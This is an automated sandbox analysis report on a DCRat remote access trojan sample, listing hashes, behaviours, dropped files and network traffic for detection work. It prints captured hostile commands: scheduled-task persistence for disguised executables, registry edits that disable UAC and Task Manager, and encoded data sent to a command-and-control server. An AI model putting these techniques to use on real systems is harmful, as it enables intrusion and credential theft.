File name:

winupd.exe

Full analysis: https://app.any.run/tasks/ca589059-a359-4f4b-8cc3-0e27a5664575
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: February 15, 2025, 21:35:07
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
dcrat
rat
remote
darkcrystal
evasion
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

2ECF13B2FFDEC170C8C741B8BC4A20C5

SHA1:

D40C32E97D65A877816A015CFFE2A8940DEBEA0D

SHA256:

70C558209D7201E690991BE17A01C6EF7F5B14775F2CFB288F0ABAFA43187FE2

SSDEEP:

98304:ZFrKdQOUq0sil6vpFol2Zj0UJNdnuRa7OTuvF7/N/i1AS1lNPOJISy4EwWBQdVEK:ZUK4yPlT38

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 3876)
      • wscript.exe (PID: 5604)
      • wscript.exe (PID: 444)

    • UAC/LUA settings modification

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • DCRAT mutex has been found

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Actions looks like stealing of personal data

      • RuntimeBroker.exe (PID: 2972)

    • Steals credentials from Web Browsers

      • RuntimeBroker.exe (PID: 2972)

    • DARKCRYSTAL has been detected (SURICATA)

      • RuntimeBroker.exe (PID: 2972)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • The process executes VB scripts

      • winupd.exe (PID: 3984)
      • RuntimeBroker.exe (PID: 2972)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 3876)
      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4320)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3876)
      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4320)

    • Reads security settings of Internet Explorer

      • winupd.exe (PID: 3984)
      • ShellExperienceHost.exe (PID: 2136)
      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • The executable file from the user directory is run by the CMD process

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 904)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3876)

    • Executed via WMI

      • schtasks.exe (PID: 4472)
      • schtasks.exe (PID: 5304)
      • schtasks.exe (PID: 5256)
      • schtasks.exe (PID: 3220)
      • schtasks.exe (PID: 5128)
      • schtasks.exe (PID: 3836)
      • schtasks.exe (PID: 1876)
      • schtasks.exe (PID: 2012)
      • schtasks.exe (PID: 1556)
      • schtasks.exe (PID: 4592)
      • schtasks.exe (PID: 4388)
      • schtasks.exe (PID: 5304)
      • schtasks.exe (PID: 440)
      • schtasks.exe (PID: 3220)
      • schtasks.exe (PID: 5256)
      • schtasks.exe (PID: 4740)
      • schtasks.exe (PID: 1876)
      • schtasks.exe (PID: 5888)
      • schtasks.exe (PID: 4132)
      • schtasks.exe (PID: 4388)
      • schtasks.exe (PID: 4160)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 1348)
      • schtasks.exe (PID: 4132)
      • schtasks.exe (PID: 3552)
      • schtasks.exe (PID: 1876)
      • schtasks.exe (PID: 2972)
      • schtasks.exe (PID: 4164)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 3296)
      • schtasks.exe (PID: 1668)
      • schtasks.exe (PID: 5684)
      • schtasks.exe (PID: 5888)
      • schtasks.exe (PID: 4164)
      • schtasks.exe (PID: 4128)
      • schtasks.exe (PID: 2380)

    • The process creates files with name similar to system file names

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)

    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 5304)
      • schtasks.exe (PID: 5256)
      • schtasks.exe (PID: 4388)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 4652)

    • Reads the date of Windows installation

      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 2356)

    • Application launched itself

      • comServer.exe (PID: 4740)

    • Starts itself from another location

      • comServer.exe (PID: 904)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 444)
      • wscript.exe (PID: 5604)

    • Executes as Windows Service

      • VSSVC.exe (PID: 4840)
      • WmiApSrv.exe (PID: 6404)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 5604)

    • Checks for external IP

      • RuntimeBroker.exe (PID: 2972)
      • svchost.exe (PID: 2192)

    • The process checks if it is being run in the virtual environment

      • RuntimeBroker.exe (PID: 2972)

    • Loads DLL from Mozilla Firefox

      • RuntimeBroker.exe (PID: 2972)

  • INFO

    • Checks supported languages

      • winupd.exe (PID: 3984)
      • ShellExperienceHost.exe (PID: 2136)
      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Reads the computer name

      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4740)
      • ShellExperienceHost.exe (PID: 2136)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Reads Environment values

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • winupd.exe (PID: 3984)

    • Process checks whether UAC notifications are on

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Reads the machine GUID from the registry

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • The sample compiled with english language support

      • comServer.exe (PID: 4740)
      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Creates files in the program directory

      • comServer.exe (PID: 4740)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)

    • Process checks computer location settings

      • comServer.exe (PID: 4740)
      • winupd.exe (PID: 3984)
      • comServer.exe (PID: 4320)
      • comServer.exe (PID: 904)
      • RuntimeBroker.exe (PID: 2972)

    • Creates files or folders in the user directory

      • winupd.exe (PID: 3984)

    • Create files in a temporary directory

      • comServer.exe (PID: 4320)
      • RuntimeBroker.exe (PID: 2972)

    • Reads Microsoft Office registry keys

      • RuntimeBroker.exe (PID: 2972)

    • Disables trace logs

      • RuntimeBroker.exe (PID: 2972)

    • Reads the software policy settings

      • RuntimeBroker.exe (PID: 2972)

    • Checks proxy server information

      • RuntimeBroker.exe (PID: 2972)

    • Reads the time zone

      • RuntimeBroker.exe (PID: 2972)

    • Reads CPU info

      • RuntimeBroker.exe (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 114176
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
181
Monitored processes
59
Malicious processes
10
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winupd.exe wscript.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #DCRAT comserver.exe shellexperiencehost.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT comserver.exe reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs w32tm.exe no specs #DCRAT comserver.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT runtimebroker.exe wscript.exe no specs wscript.exe no specs SPPSurrogate no specs vssvc.exe no specs wmiapsrv.exe no specs svchost.exe winupd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
440schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\PCHealthCheck\kk-KZ\dllhost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
444"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a2544bd3-86cd-4b84-aac7-a7b49dd1df48.vbs" C:\Windows\System32\wscript.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
904"C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe" C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\surrogateagentwinhostsvc\comserver.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1348schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\OEM\fontdrvhost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1544C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.bat" "C:\Windows\SysWOW64\cmd.exewinupd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
255
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1556schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Application Data\winlogon.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1668schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\found.000\dir_00000002.chk\RuntimeBroker.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1876schtasks.exe /create /tn "uhssvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\uhssvc.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1876reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fC:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
Total events
16 066
Read events
15 982
Write events
84
Delete events
0

Modification events

(PID) Process:(3984) winupd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(3984) winupd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(4740) comServer.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(4740) comServer.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(4740) comServer.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(4740) comServer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process:(2136) ShellExperienceHost.exeKey:\REGISTRY\A\{5990eaaa-9b89-2e14-ce82-5d4afb9ebbe0}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D00000060E89688F17FDB01
(PID) Process:(4740) comServer.exeKey:HKEY_CURRENT_USER\SOFTWARE\3645904f5767e188620c7a665cb0a97161785213
Operation:writeName:a9a2250d8cd79de1542cb78d3d051e7b79af13d9
Value:
WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxSb2FtaW5nXFxTdXJyb2dhdGVhZ2VudHdpbmhvc3RTdmNcXGNvbVNlcnZlci5leGUiLCJDOlxcUHJvZ3JhbSBGaWxlc1xcV2luZG93cyBOVFxcbHNhc3MuZXhlIiwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXENvbW1vbiBGaWxlc1xcU2VydmljZXNcXHVoc3N2Yy5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXEFwcGxpY2F0aW9uIERhdGFcXHdpbmxvZ29uLmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxQQ0hlYWx0aENoZWNrXFxray1LWlxcZGxsaG9zdC5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcTXVzaWNcXFN5c3RlbVNldHRpbmdzLmV4ZSJd
(PID) Process:(1876) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableTaskMgr
Value:
1
(PID) Process:(4320) comServer.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
Executable files
14
Suspicious files
26
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
3984winupd.exeC:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\file.vbstext
MD5:677CC4360477C72CB0CE00406A949C61
SHA256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
3984winupd.exeC:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\JftB588kS8HFRKWqxhl.battext
MD5:B67C9BB396B21E0E95E7DD8F7C60D663
SHA256:EA9788B3ACCECECD55CBAC9547BDEACC5FFCA6AFCC539F3EBCA6E6E145A628EE
3984winupd.exeC:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\7ZvVvN50EFKnm8Vgdn5X9sFuUOtSV.battext
MD5:CAEBABADF1F6DF734E1A4461A666B6C2
SHA256:1E104EF21547EEFDD1FC0E85629824A10192C91F6BA9C6C58CFFC0C423A387C1
4320comServer.exeC:\Program Files\PCHealthCheck\42af1c969fbb7btext
MD5:47589F84C40BD7F9D18F01B261698CC3
SHA256:A33C21B73CEE0ED0F505EE2943ABF8337FAECC90922C6E5D7E71993F6CB8199A
4740comServer.exeC:\Users\Default\AppData\Roaming\cc11b995f2a76dtext
MD5:AF13FD13AF2EEDB33768D18F213CB7A6
SHA256:A902F8672CCD7A5971BD5E29AF4A5B51D658A9D982F5F2345F35FC4323A3FCC9
4740comServer.exeC:\Program Files (x86)\Common Files\Services\105eec298f1910text
MD5:0CF00A9D1A9A48C063C9F74AC5FD3C59
SHA256:0AA99036FFC7B068E800E61F9ECC9AF5F398FF9AB014E08EF17CD37627A42BE1
4740comServer.exeC:\Program Files\Windows NT\lsass.exeexecutable
MD5:19AD0B4DE848E37C6CF895F988A4506E
SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C
4320comServer.exeC:\Windows\InputMethod\SHARED\5b884080fd4f94text
MD5:8CFC8C28BB4950B8234AEACD2FB9D96A
SHA256:0ACE73A57235432CF87B3BDA4B4EFF44566D7926E5FCA1DF2629EBD106335673
3984winupd.exeC:\Users\admin\AppData\Roaming\SurrogateagentwinhostSvc\comServer.exeexecutable
MD5:19AD0B4DE848E37C6CF895F988A4506E
SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C
4740comServer.exeC:\Program Files (x86)\Common Files\Services\uhssvc.exeexecutable
MD5:19AD0B4DE848E37C6CF895F988A4506E
SHA256:A2E44A635BBB801F6CC86FC389159FBD90B7C79D45DDC357AA243F2E4299935C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
109
TCP/UDP connections
24
DNS requests
8
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4300
svchost.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2972
RuntimeBroker.exe
GET
200
185.176.43.100:80
http://sigmabioaef.atwebpages.com/12884306.php?EPgL9azSH=HcZc7&MIt7vNySOctMRmSz37z8xkXzx5K=MsoPwW&76e092120dcc2716a0bf904405c3bb60=8322613b920ea533a4ee10ee219e2de4&d730d9f9ce4aee48722b12e1fd23db7e=AZkFWYwUDN3AzNxMTM5MjM5cTYzImZ4YTYlVzM4EWY0ATM3EDN0U2N&EPgL9azSH=HcZc7&MIt7vNySOctMRmSz37z8xkXzx5K=MsoPwW
unknown
malicious
2972
RuntimeBroker.exe
GET
185.176.43.100:80
http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&714839bee31f9c5256b219d4a9de7452=d1nI4EWMhFjZmFzYwUjMjZjNxYGMwEGO3YjNwMWN0kjZ5MWNxgTNjRWM5IiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W
unknown
malicious
4300
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2972
RuntimeBroker.exe
GET
200
185.176.43.100:80
http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W
unknown
malicious
2972
RuntimeBroker.exe
GET
200
185.176.43.100:80
http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&8840cb222f57329aad528a7e4bfbb468=d1nIkJ1VaBjSYlFMOhUS1xmMaFDeHV1ZwMUSOJkRJdXVq9UMNp2T1E0UOlXQq1kdVRVT2lkeXJiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiIkNjNxQmY1EmMhlDOxIWM2ImY5czY2AjNmZ2MmBjYmdTNwYTM1QWYlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W
unknown
malicious
2972
RuntimeBroker.exe
GET
200
185.176.43.100:80
http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&cf8ea13bf03810691a09f6ee9c86037a=0VfiIiOicDZjZGZiNTOiVjY0QDM0EWOzMDZiNWMwcjNlhzNxIGNiwiI5ATMykzM0MjNhJDOmhTZ4MDMkRGNhJGM5UmY1YWNhRDOiRGO5QGZlJiOiUjMjdjY4Y2N1MmN2IjYwQmNjhjYkRWMzU2MxQTZ5UGOiwiI2YDZlBDNlVzNhNGN0UGM3cjY3QWNilDMhVGZklTYiVDO0EzM1IWMhJiOiAjZ3kDZzEjMzQmNmFWO2cjZiVzY3YTO0UDMzMDZ2EmNis3W
unknown
malicious
2972
RuntimeBroker.exe
GET
200
185.176.43.100:80
